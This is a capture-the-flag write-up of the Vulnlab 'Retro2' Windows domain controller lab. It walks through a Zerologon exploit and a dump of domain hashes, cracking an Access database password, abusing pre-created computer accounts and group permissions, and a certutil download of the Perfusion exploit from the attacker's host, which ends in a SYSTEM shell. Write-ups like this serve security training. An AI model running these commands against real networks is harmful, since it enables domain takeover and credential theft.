vulnlab-retro2

vulnlab-retro2

Retro2 is an easy old-school Windows 2008 DC , that involves decrypting MSAccess database, Pre-Created Computer Accounts, GenericWrite, AddMember & Perfusion.exe

nmap scan

# Nmap 7.93 scan initiated Wed Aug 28 09:41:18 2024 as: nmap -Pn -sC -sV -oN retro2.nmap 10.10.122.16
Nmap scan report for 10.10.122.16
Host is up (0.019s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-28 07:41:28Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: BLN01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   210: 
|_    Message signing enabled and required
|_clock-skew: mean: -40m00s, deviation: 1h09m16s, median: -1s
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: BLN01
|   NetBIOS computer name: BLN01\x00
|   Domain name: retro2.vl
|   Forest name: retro2.vl
|   FQDN: BLN01.retro2.vl
|_  System time: 2024-08-28T09:42:17+02:00
| smb2-time: 
|   date: 2024-08-28T07:42:18
|_  start_date: 2024-08-28T07:40:52
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Aug 28 09:42:57 2024 -- 1 IP address (1 host up) scanned in 99.04 seconds

 

unintended zerologon

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ python3 cve-2020-1472-exploit.py bln01 10.10.122.16 
Performing authentication attempts...
===============================================================================================
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!

netexec

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ impacket-secretsdump -just-dc -no-pass bln01\$@10.10.122.16     
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c0<redacted>48:::

enumerate SMB shares

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ netexec smb 10.10.122.16         
SMB         10.10.122.16    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)

.

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ netexec smb 10.10.122.16 -u 'puck' -p '' --shares 
SMB         10.10.122.16    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.10.122.16    445    BLN01            [+] retro2.vl\puck: 
SMB         10.10.122.16    445    BLN01            [*] Enumerated shares
SMB         10.10.122.16    445    BLN01            Share           Permissions     Remark
SMB         10.10.122.16    445    BLN01            -----           -----------     ------
SMB         10.10.122.16    445    BLN01            ADMIN$                          Remote Admin
SMB         10.10.122.16    445    BLN01            C$                              Default share
SMB         10.10.122.16    445    BLN01            IPC$                            Remote IPC
SMB         10.10.122.16    445    BLN01            NETLOGON                        Logon server share 
SMB         10.10.122.16    445    BLN01            Public          READ            
SMB         10.10.122.16    445    BLN01            SYSVOL                          Logon server share 

.

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ impacket-smbclient guest@retro2.vl -no-pass
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# use Public
# ls
drw-rw-rw-          0  Sat Aug 17 16:30:37 2024 .
drw-rw-rw-          0  Sat Aug 17 16:30:37 2024 ..
drw-rw-rw-          0  Sat Aug 17 16:30:37 2024 DB
drw-rw-rw-          0  Sat Aug 17 13:58:07 2024 Temp
# cd DB
# ls
drw-rw-rw-          0  Sat Aug 17 16:30:37 2024 .
drw-rw-rw-          0  Sat Aug 17 16:30:37 2024 ..
-rw-rw-rw-     876544  Sat Aug 17 16:30:34 2024 staff.accdb
# get staff.accdb

If we open it with Microsoft Access, it prompts for a password.  We use office2john to extract the hash and then crack it.

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ office2john staff.accdb | tee officehash
staff.accdb:$office$*2013*100000*256*16*5736<redacted>8235

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ john officehash.txt --wordlist=/usr/share/wordlists/rockyou.txt  
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:03 0.00% (ETA: 06:07:07) 0g/s 223.4p/s 223.4c/s 223.4C/s bambam..james1
cl<redacted>08          (staff.accdb)     

in accesdb we find
strsUser = “retro2\ldapreader”
strsPassword = “pp<redacted>5R”

Bloodhound analyze

bloodhound-python -d retro2.vl -c all -u ldapreader -p pp<redacted>5R -ns 10.10.122.16 --dns-tcp --zip

we find:

The computer Account FS01 is a member of the Domain Computers group.
The Domain Computers group has GenericWrite over ADMWS01.
ADMWS01 has the AddSelf permission over the Services group.
Services group members can RDP to DC BLN01

.

we have guessed pasword computer is same as computername FS01 ,we cannot use this computer account, because the password has not been changed. so we use rpcchangepwd.py

wget https://raw.githubusercontent.com/api0cradle/impacket/a1d0cc99ff1bd4425eddc1b28add1f269ff230a6/examples/rpcchangepwd.py

.

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ python3 rpcchangepwd.py retro2.vl/fs01\$:fs01@10.10.122.16 -newpass P@ssw0rd 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Password was changed successfully.

abuse the GenericWrite permission

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ netexec smb retro2.vl -u 'fs01$' -p 'P@ssw0rd'
SMB         10.10.122.16    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.10.122.16    445    BLN01            [+] retro2.vl\fs01$:P@ssw0rd 

.

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$  net rpc password 'ADMWS01$' Passw0rd1 -U retro2.vl/'fs01$'%P@ssw0rd -S bln01.retro2.vl 

.

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$ netexec smb retro2.vl -u 'ADMWS01$' -p 'P@ssw0rd'                                  
SMB         10.10.122.16    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.10.122.16    445    BLN01            [-] retro2.vl\ADMWS01$:P@ssw0rd STATUS_LOGON_FAILURE 

.

with BloodyAD we add ‘ldapreader’ to the Services group

┌──(puck㉿kali)-[~/vulnlab/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py --host 10.10.122.16 -d retro2.vl -u 'ADMWS01$' -p 'Passw0rd1' add groupMember 'SERVICES' 'ldapreader'
[+] ldapreader added to SERVICES

now we can RDP into the box

┌──(puck㉿kali)-[~/vulnlab/retro2]
└─$  xfreerdp /u:'ldapreader' /p:'pp<redacted>5R' /v:10.10.122.16 /d:retro2.vl /tls-seclevel:0 

Privesc

Any local user can create a Performance subkey and then leverage the Windows Performance Counters to load an arbitrary DLL in the context of the WMI service as NT AUTHORITY\SYSTEM (hence the tool’s name).

c:\temp>certutil.exe -urlcache -f http://10.8.2.138:8000/Perfusion.exe Perfusion
.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\temp> .\Perfusion.exe -c cmd -i
[*] Created Performance DLL: C:\Users\LDAPRE~1\AppData\Local\Temp\2\performance_
2844_2224_2.dll
[*] Created Performance registry key.
[*] Triggered Performance data collection.
[+] Exploit completed. Got a SYSTEM token! :)
[*] Waiting for the Trigger Thread to terminate... OK
[!] Failed to delete Performance registry key.
[*] Deleted Performance DLL.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\temp>whoami
nt authority\system

c:\temp>type c:\users\administrator\desktop\root.txt
VL{fc<redacted>46}

That was oldschool fun

 

 

 

 

 

 

 

 

 

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *